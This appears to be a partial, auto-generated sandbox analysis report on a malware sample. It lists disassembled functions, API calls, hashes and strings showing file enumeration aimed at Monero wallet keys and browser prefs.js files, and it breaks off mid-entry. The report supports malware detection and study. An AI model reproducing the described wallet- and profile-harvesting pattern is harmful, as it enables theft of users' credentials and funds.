                      • Instruction Fuzzy Hash: E25120B150021CABCB34EF70EC89FEA7378AF58301F405598E61AA6184EB759A948F91
                      Function 00EF3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 00EF3EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF3EDA
                      • StrCmpCA.SHLWAPI(?,00F00FAC), ref: 00EF3F08
                      • StrCmpCA.SHLWAPI(?,00F00FB0), ref: 00EF3F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF406C
                      • FindClose.KERNEL32(000000FF), ref: 00EF4081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: ce18a4532fecc3476d239d0ee8bc34c42e06a73ddb41f002366156921dbd7d60
                      • Instruction ID: a10601665b0c8c65d72a84dd1fbeed4ae2bf1aab0621b57f1a64b1b07d09aad3
                      • Opcode Fuzzy Hash: ce18a4532fecc3476d239d0ee8bc34c42e06a73ddb41f002366156921dbd7d60
                      • Instruction Fuzzy Hash: 335124B6500218ABCB38EBB0DC45EFA73BCBF44301F404598F759A6084EA75DB958F51
                      Function 00EEED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 00EEED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EEED55
                      • StrCmpCA.SHLWAPI(?,00F01538), ref: 00EEEDAB
                      • StrCmpCA.SHLWAPI(?,00F0153C), ref: 00EEEDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEF2AE
                      • FindClose.KERNEL32(000000FF), ref: 00EEF2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: ff89ffc42a5eb32673f2e952f5ba17c465f0bf153784a8270df8024af53d942b
                      • Instruction ID: 741b821d6fe368de6c4750fd6e3849d2dfd5629d337a0a1ca2d7a619f5a95351
                      • Opcode Fuzzy Hash: ff89ffc42a5eb32673f2e952f5ba17c465f0bf153784a8270df8024af53d942b
                      • Instruction Fuzzy Hash: 29E120B281115C9ADB18FB20DC55EFE73B8AF94340F4451B9B60A76092EF706B8ACF51
                      Function 00EEF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F015B8,00F00D96), ref: 00EEF71E
                      • StrCmpCA.SHLWAPI(?,00F015BC), ref: 00EEF76F
                      • StrCmpCA.SHLWAPI(?,00F015C0), ref: 00EEF785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEFAB1
                      • FindClose.KERNEL32(000000FF), ref: 00EEFAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 941f3ef5a3e3eff23b20d33d854727ef2febdd1273ce3df9726800c4a7b3b47c
                      • Instruction ID: ccd4a8acdaa40a61154258579545a6c5f91ea17d32a8d0c5ad9509b92e920b29
                      • Opcode Fuzzy Hash: 941f3ef5a3e3eff23b20d33d854727ef2febdd1273ce3df9726800c4a7b3b47c
                      • Instruction Fuzzy Hash: EDB123B290014C9BCB28FF60DC55AFD73B9AF94300F4491B9E50E6A195EF706B49CB92
                      Function 00EE16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F0510C,?,?,?,00F051B4,?,?,00000000,?,00000000), ref: 00EE1923
                      • StrCmpCA.SHLWAPI(?,00F0525C), ref: 00EE1973
                      • StrCmpCA.SHLWAPI(?,00F05304), ref: 00EE1989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EE1D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00EE1DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EE1E20
                      • FindClose.KERNEL32(000000FF), ref: 00EE1E32
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: 519c5a3fc83999ee492b3ec6757f0dbed5158e408f843e04027f7565e4b2599a
                      • Instruction ID: 2bc5b2b05f7bbea506cffcef6cca63248b1f24653108120016a56eddbf7b846c
                      • Opcode Fuzzy Hash: 519c5a3fc83999ee492b3ec6757f0dbed5158e408f843e04027f7565e4b2599a
                      • Instruction Fuzzy Hash: 561221B291015C9ACB19EB60DC96AFE73B8AF54340F4451B9B20E76091EF706F89CF91
                      Function 00EEDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F00C2E), ref: 00EEDE5E
                      • StrCmpCA.SHLWAPI(?,00F014C8), ref: 00EEDEAE
                      • StrCmpCA.SHLWAPI(?,00F014CC), ref: 00EEDEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEE3E0
                      • FindClose.KERNEL32(000000FF), ref: 00EEE3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 465e4df6fd695d6d9358bf014227ded711fefeb84cfdbc0173842924db96025c
                      • Instruction ID: 864567e85e8db20b60a524e9b8301c00ef95b052f1d4dac468fefd148491c67d
                      • Opcode Fuzzy Hash: 465e4df6fd695d6d9358bf014227ded711fefeb84cfdbc0173842924db96025c
                      • Instruction Fuzzy Hash: 3DF1DEB281015C9ACB29EB60DC95EFE73B8BF54340F8451B9A60E76091EF706B89CF51
                      Function 00EEDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F014B0,00F00C2A), ref: 00EEDAEB
                      • StrCmpCA.SHLWAPI(?,00F014B4), ref: 00EEDB33
                      • StrCmpCA.SHLWAPI(?,00F014B8), ref: 00EEDB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEDDCC
                      • FindClose.KERNEL32(000000FF), ref: 00EEDDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 7e673f6544a748ae8260e9c2d888d2f717a85b7caabea5932e01420a6a6abd9e
                      • Instruction ID: daac445cc4df5d497c86d752db306d9e1cc43d6a1789d654a6e66ba3555ed275
                      • Opcode Fuzzy Hash: 7e673f6544a748ae8260e9c2d888d2f717a85b7caabea5932e01420a6a6abd9e
                      • Instruction Fuzzy Hash: BA9156B290010C97CB14FF70EC569FD73BD6B84340F049578F91AAA185EE74AB598B92
                      Function 00EF7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,00F005AF), ref: 00EF7BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00EF7BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EF7C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EF7C62
                      • LocalFree.KERNEL32(00000000), ref: 00EF7D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 1d3a1fdaa73c461b99ac5848587fa6876413bba0502e1bf50db13d58a86c224e
                      • Instruction ID: 2728a14f65927607d8df49cceb7d3739e3b28e3b5e516a448bf6969e53ab355f
                      • Opcode Fuzzy Hash: 1d3a1fdaa73c461b99ac5848587fa6876413bba0502e1bf50db13d58a86c224e
                      • Instruction Fuzzy Hash: 2541F7B194021CABDB24DF94DC99BFEB7B4EF48700F2041A9E60976181DB746B85CFA1
                      Function 00EEE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F00D73), ref: 00EEE4A2
                      • StrCmpCA.SHLWAPI(?,00F014F8), ref: 00EEE4F2
                      • StrCmpCA.SHLWAPI(?,00F014FC), ref: 00EEE508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEEBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: 402c182016b60f3bb48aa4ed5e7e4eede5071588d86e8cab724457c9e265714e
                      • Instruction ID: a8dbc1878b1c25e59dc617650c02a3ad35ee4db4a4f9e480547a680c6ba3fcaa
                      • Opcode Fuzzy Hash: 402c182016b60f3bb48aa4ed5e7e4eede5071588d86e8cab724457c9e265714e
                      • Instruction Fuzzy Hash: 021231B290011C9ADB18FB60DC56EFD73B8AF94340F4451B9B60E7A095EF706B49CB92
                      Function 012AA0F9 Relevance: 9.2, Strings: 6, Instructions: 1663COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #n$-DZw$a;}$zB??$bzg$o~
                      • API String ID: 0-2225315989
                      • Opcode ID: 804319117b9e0cda65ddc5009827439b3730d84874c71ae88b7a8ffea8148b5b
                      • Instruction ID: 962c63a9272aa229cb3dddcbd1cad2adafd1317cffba173b3a80741132bc954e
                      • Opcode Fuzzy Hash: 804319117b9e0cda65ddc5009827439b3730d84874c71ae88b7a8ffea8148b5b
                      • Instruction Fuzzy Hash: CBB247F36082049FE304AE2DEC8567ABBE9EFD4720F1A493DE6C5C3744EA3558058657
                      Function 00EE9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                      Download Yara Rule
                      APIs
